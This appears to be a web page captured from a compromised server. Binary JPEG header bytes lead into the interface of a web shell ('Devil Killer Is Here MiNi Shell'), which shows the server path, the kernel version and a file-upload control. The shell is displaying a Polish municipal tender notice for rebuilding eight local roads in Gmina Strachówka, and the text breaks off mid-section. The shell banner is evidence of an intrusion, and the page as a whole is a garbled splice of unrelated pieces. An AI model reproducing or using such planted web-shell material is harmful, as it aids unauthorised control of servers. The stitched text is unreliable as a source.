JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240710/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240710/0040674201-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> BUDOWA I MODERNIZACJA INFRASTRUKTURY DROGOWEJ NA TERENIE GMINY STRACHÓWKA </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA STRACHÓWKA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 711582724</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Cypriana Kamila Norwida 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Strachówka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-282</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">257562828</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">257562829</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@strachowka.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.strachowka.4bip.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> BUDOWA I MODERNIZACJA INFRASTRUKTURY DROGOWEJ NA TERENIE GMINY STRACHÓWKA </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2720c532-7ec5-4c7b-899a-63e1ce08ae05</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00406742</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00041635/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.5 Budowa i modernizacja infrastruktury drogowej na terenie gminy Strachówka</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://strachowka.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://strachowka.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem platformy zakupowej pod adresem https://strachowka.ezamawiajacy.pl zwanej dalej Platformą. Szczegółowe informacje dotyczące przyjętego w postępowaniu sposobu komunikacji, znajdują się w rozdziale III podrozdziale 1 niniejszej SWZ<br/>Uwaga! Przed przystąpieniem do składania oferty, wykonawca jest zobowiązany zapoznać się z Instrukcją korzystania z Platformy zakupowej. Instrukcja została zamieszona bezpośrednio na ww. Platformie.<br/>Informacja o sposobie porozumiewania się z wykonawcami<br/>1. W niniejszym postępowaniu komunikacja zamawiającego z wykonawcami odbywa się za pomocą środków komunikacji elektronicznej.<br/>2. Pytania do SWZ należy zadawać za pośrednictwem platformy zakupowej zamawiającego przez link: https://strachowka.ezamawiajacy.pl. Instrukcja korzystania z systemu jest dostępna pod wyżej wskazanym adresem.<br/>3. Oferta wraz z załącznikami musi być złożona w postaci elektronicznej w systemie informatycznym dostępnym pod adresem https://strachowka.ezamawiajacy.pl.<br/>4. Za datę złożenia oferty, przekazania wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na platformę zakupową zamawiającego, opisane zostały w Instrukcji dla wykonawców która jest udostępniana na platformie zakupowej zamawiającego.<br/>5. Wymagania dotyczące zasad rejestracji oraz minimalnych parametrów technicznych wymaganych od wykonawcy przy wykorzystywaniu systemu do elektronicznej komunikacji z wykonawcami:<br/>Oferta wraz z załącznikami musi zostać złożona w postaci elektronicznej. Złożenie oferty wymaga od Wykonawcy zarejestrowania się i zalogowania w systemie informatycznym dostępnym pod adresem https://strachowka.ezamawiajacy.pl, zgodnie z poniższą kolejnością. Rejestracja wykonawcy trwa maksymalnie do 2 dni roboczych. Mając to na uwadze, zamawiający zaleca wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia oferty w postaci elektronicznej. Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca biorący udział <br/>w postępowaniu prowadzonym drogą elektroniczną w systemie zakłada konto, wykonując kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”. Po założeniu konta wykonawca ma możliwość złożenia oferty w postępowaniu.<br/>6. Zamawiający wskazuje informacje, o których mowa w Rozporządzeniu Prezesa Rady Ministrów w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie, dotyczące systemu dostępnego pod adresem https://strachowka.ezamawiajacy.pl:<br/>• komputer PC/MAC z aktualnym systemem operacyjnym wspieranym przez producenta,<br/>• Wybrana przeglądarka wspierana przez producenta: MS Internet Explorer, Firefox, Google Chrome lub MS Edge,<br/>• Podłączenie do Internetu: min. 512 Kb/s na komputer (zalecane szerokopasmowe łącze internetowej).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem Państwa danych osobowych jest: Gmina Strachówka, reprezentowana przez Wójta Gminy Strachówka, z siedzibą: ul. C.K.Norwida 6, 05-282 Strachówka, tel. (25) 756 28 28;<br/>e-mail: zamowienia.publiczne@strachowka.com.pl<br/>2. Na mocy art. 37 ust. 1 lit. a) RODO Administrator wyznaczył Inspektora Ochrony Danych (IOD) – Pana Krzysztofa Mikulskiego , Z IOD można kontaktować się pod adresem mail: iodkm@tbdsiedlce.pl.<br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego nr ZP.271.3.2024 na „BUDOWA I MODERNIZACJA INFRASTRUKTURY DROGOWEJ NA TERENIE GMINY STRACHÓWKA”<br/>4. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy z dnia 11 września 2019r. – Prawo zamówień publicznych (t.j. Dz. U. z 2023 r. poz. 1605 z późn. zm.), dalej „ustawa PZP” , związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego. Konsekwencją niepodania danych osobowych może być brak możliwości udzielenia zamówienie publicznego. W szczególności niepodanie stosownych danych osobowych może skutkować odrzuceniem oferty wykonawcy.<br/>5. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy PZP. <br/>6. Administrator może udostępnić Państwa dane innym podmiotom na podstawie umów powierzenia danych zawartych z podmiotami świadczących usługi na rzecz Administratora. <br/>7. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy; <br/>8.	Przysługuje Pani/Panu, z wyjątkami zastrzeżonymi przepisami prawa, możliwość:<br/>•	dostępu do danych osobowych jej/jego dotyczących oraz otrzymania ich kopii o którym mowa w art.. 15 RODO *,<br/>• żądania sprostowania lub uzupełnienia danych osobowych na podstawie z art. 16 RODO, przy czym skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą (art. 19 ust. 2 PZP)<br/>•	w związku z art. 18 RODO żądania ograniczenia przetwarzania danych osobowych przy czym prawo to nie ma zastosowania w odniesieniu do przechowywania, przetwarzania danych w celu zapewnienia korzystania z środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego**.<br/>9.	Nie przysługuje Pani/Panu:<br/>• w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>• prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>•	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>10.	Z powyższych uprawnień można skorzystać w siedzibie Administratora, kierując korespondencję na adres Administratora lub drogą elektroniczną pisząc na adres: iod-km@tbdsiedlce.pl.<br/>11.	Przysługuje Państwu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Państwa danych osobowych. Organem właściwym dla ww. skargi jest:<br/>Prezes Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa<br/>12.	Jednocześnie Zamawiający przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art. 14 RODO względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">B) Dane osobowe wykonawcy będą przetwarzane na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie<br/>zamówienia publicznego pn. „BUDOWA I MODERNIZACJA INFRASTRUKTURY DROGOWEJ NA TERENIE GMINY STRACHÓWKA”<br/>c) Odbiorcami przekazanych przez wykonawcę danych osobowych będą osoby lub podmioty, którym<br/>zostanie udostępniona dokumentacja postępowania zgodnie z art. 8 oraz art. 96 ust. 3 ustawy Pzp, a<br/>także art. 6 ustawy z 6 września 2001 r. o dostępie do informacji publicznej.<br/>d) Dane osobowe wykonawcy zawarte w protokole postępowania będą przechowywane przez okres 4<br/>lat, od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>e) Klauzula informacyjna, o której mowa w art. 13 ust. 1 i 2 RODO znajduje się w załączniku nr 3 do<br/>SWZ.<br/>f) Zamawiający nie planuje przetwarzania danych osobowych wykonawcy w celu innym niż cel<br/>określony w lit. b powyżej. Jeżeli administrator będzie planował przetwarzać dane osobowe w celu<br/>innym niż cel, w którym dane osobowe zostały zebrane (tj. cel określony w lit. b powyżej), przed takim<br/>dalszym przetwarzaniem poinformuje on osobę, której dane dotyczą, o tym innym celu oraz udzieli jej<br/>wszelkich innych stosownych informacji, o których mowa w art. 13 ust. 2 RODO.<br/>g) Wykonawca jest zobowiązany, w związku z udziałem w przedmiotowym postępowaniu, do<br/>wypełnienia wszystkich obowiązków formalno-prawnych wymaganych przez RODO i związanych z<br/>udziałem w przedmiotowym postępowaniu o udzielenie zamówienia. Do obowiązków tych należą:<br/>- obowiązek informacyjny przewidziany w art. 13 RODO<br/>- obowiązek informacyjny wynikający z art. 14 RODO .<br/>h) W celu zapewnienia, że wykonawca wypełnił ww. obowiązki informacyjne oraz ochrony prawnie<br/>uzasadnionych interesów osoby trzeciej, której dane zostały przekazane w związku z udziałem w<br/>postępowaniu, wykonawca składa oświadczenia o wypełnieniu przez niego obowiązków<br/>informacyjnych przewidzianych w art. 13 lub art. 14 RODO<br/>i) Zamawiający informuje, że:<br/>- Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO w celu umożliwienia<br/>korzystania ze środków ochrony prawnej, o których mowa w dziale IX ustawy Pzp,<br/>- Udostępnianie protokołu i załączników do protokołu ma zastosowanie do wszystkich danych<br/>osobowych, z wyjątkiem tych, o których mowa w art. 9 ust. 1 RODO zebranych w toku postępowania o<br/>udzielenie zamówienia.<br/>- W przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez zamawiającego,<br/>z uprawnienia, o którym mowa w art. 15 ust. 1–3 RODO , zamawiający może żądać od osoby<br/>występującej z żądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie nazwy<br/>lub daty zakończonego postępowania o udzielenie zamówienia.<br/>- Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia, o którym mowa w art. 16RODO (z uprawnienia do<br/>sprostowania lub uzupełnienia danych osobowych), nie może naruszać<br/>integralności protokołu postępowania oraz jego załączników.<br/>- W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym<br/>mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia<br/>tego postępowania.<br/>- W przypadku gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 RODO<br/>spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole postępowania lub<br/>załącznikach do tego protokołu, od dnia zakończenia postępowania o udzielenie zamówienia<br/>zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o których mowa w art. 18 ust.<br/>2 rozporządzenia 2016/679.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.3.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakres przedmiotu zamówienia obejmuje wykonanie n/w robót budowlanych: <br/>1. Przebudowa drogi gminnej nr 430805W Kąty – Miąski (dz. ewid. nr 390 obręb 0007 Kąty – Miąski) o szerokości 5,0 m i długości ok. 525 m, dla której zaplanowano:<br/>1)	Wykonanie jezdni z betonu asfaltowego. <br/>2)	Wykonanie zjazdów indywidualnych <br/>3)	Wykonanie poboczy o szerokości 0,75 m <br/>4)	Wykonanie stałej organizacji ruchu <br/>5)	Pozostałe roboty.<br/>2. Przebudowa drogi gminnej wewnętrznej w miejscowości Księżyki (dz. ewid. nr 134 obręb 0010 Księżyki) o szerokości 4,0 ÷ 5,0 m i długości ok. 810 m, dla której zaplanowano:<br/>1)	Wykonanie jezdni z betonu asfaltowego <br/>2)	Wykonanie zjazdów indywidualnych <br/>3)	Wykonanie poboczy o szerokości 0, 5 m <br/>4)	Wykonanie stałej organizacji ruchu <br/>5)	Pozostałe roboty.<br/>3. Przebudowa drogi gminnej wewnętrznej w miejscowości Grabszczyzna (dz. ewid. nr 130, 162, 106 obręb 0003 Grabszczyzna) o szerokości 4,0 ÷ 5,0 m i długości ok. 504 m, dla której zaplanowano:<br/>1)	Wykonanie jezdni poprzez trzykrotne powierzchniowe utrwalenie <br/>2)	Wykonanie zjazdów indywidualnych <br/>3)	Wykonanie poboczy o szerokości 0, 5 m <br/>4)	Wykonanie stałej organizacji ruchu <br/>5)	Pozostałe roboty<br/>4. Budowa drogi gminnej nr 430822W w miejscowości Kąty – Wielgi (dz. ewid. nr 131/1, 138, 139 obręb 0008 Kąty – Wielgi) o szerokości 5,0 m i długości ok. 565 m, dla której zaplanowano:<br/>1)	Wykonanie jezdni z betonu asfaltowego <br/>2)	Wykonanie zjazdów indywidualnych <br/>3)	Wykonanie poboczy o szerokości 0,5 m <br/>4)	Wykonanie stałej organizacji ruchu <br/>5)	Pozostałe roboty<br/>5. Przebudowa drogi gminnej nr 430804W w miejscowości Krawcowizna (dz. ewid. nr 3, 16, 28, 63 obręb 0009 Krawcowizna) o szerokości 4,0 ÷ 5,0 m i długości ok. 711 m, dla której zaplanowano:<br/>1)	Wykonanie jezdni z betonu asfaltowego <br/>2)	Wykonanie jezdni poprzez trzykrotne powierzchniowe utrwalenie <br/>3)	Wykonanie zjazdów indywidualnych <br/>4)	Wykonanie poboczy o szerokości 0,75 m <br/>5)	Wykonanie opaski granitowej o szerokości 1,0 m <br/>6)	Wykonanie stałej organizacji ruchu <br/>7)	Pozostałe roboty<br/>6. Przebudowa drogi gminnej wewnętrznej w miejscowości Osęka (dz. ewid. nr 143, 194 obręb 0013 Osęka) o szerokości 4,0 ÷ 5,0 m i długości ok. 450 m, dla której zaplanowano:<br/>1)	Wykonanie jezdni z betonu asfaltowego <br/>2)	Wykonanie jezdni poprzez trzykrotne powierzchniowe utrwalenie <br/>3)	Wykonanie zjazdów indywidualnych <br/>4)	Wykonanie poboczy o szerokości 0,5 m <br/>5)	Wykonanie stałej organizacji ruchu <br/>6)	Pozostałe roboty.<br/>7.	Przebudowa drogi gminnej wewnętrznej w miejscowości Kąty – Czernickie (dz. ewid. nr 69, 117, 144 obręb 0006 Kąty – Czernickie) o szerokości 4,0 ÷ 4,5 m i długości ok. 512 m +178 m, tj. łącznie 690 m dla której zaplanowano:<br/>1)	Wykonanie jezdni poprzez trzykrotne powierzchniowe utrwalenie <br/>2)	Wykonanie nawierzchni jezdni z kruszywa łamanego 0/31,5 <br/>3)	Wykonanie zjazdów indywidualnych <br/>4)	Wykonanie poboczy o szerokości 0,5 m <br/>5)	Wykonanie stałej organizacji ruchu <br/>6)	Pozostałe roboty.<br/>8.	Przebudowa drogi gminnej nr 430803W w miejscowości Równe (dz. ewid. nr 251, 684, 624 obręb 0016 Równe) o szerokości 4,0 ÷ 5,0 m i długości ok. 710 m, dla której zaplanowano:<br/>1)	Wykonanie jezdni z betonu asfaltowego <br/>2)	Wykonanie jezdni poprzez trzykrotne powierzchniowe utrwalenie <br/>3)	Wykonanie zjazdów indywidualnych <br/>4)	Wykonanie poboczy o szerokości 0,75 m <br/>5)	Wykonanie stałej organizacji ruchu <br/>6)	Pozostałe roboty.<br/>Szczegółowy zakres zamówienia określa dokumentacja projektowa, przedmiar robót, szczegółowa specyfikacja techniczna wykonania i odbioru robót. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">15 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielenie zamówień na podstawie art. 214 ust. 1 pkt 7 i 8 ustawy Pzp - zamówienia polegającego na powtórzeniu<br/>podobnych robót budowlanych, zgodnych z przedmiotem zamówienia podstawowego, o wartości do 50 % wartości zamówienia<br/>podstawowego obejmujących powtórzenie podobnych robót budowlanych jak w zamówieniu podstawowym. Zamówienie zostanie<br/>udzielone na warunkach określonych w umowie do zamówienia podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Kryteria oceny ofert - zamawiający uzna oferty za spełniające wymagania i przyjmie do szczegółowego rozpatrywania, jeżeli:<br/>1.1. oferta, spełnia wymagania określone niniejszą specyfikacją,<br/>1.2. oferta została złożona, w określonym przez zamawiającego terminie,<br/>1.3. wykonawca przedstawił ofertę zgodną co do treści z wymaganiami zamawiającego,<br/>1.4. wniesiono poprawnie wadium.<br/>2. Kryteria oceny ofert - stosowanie 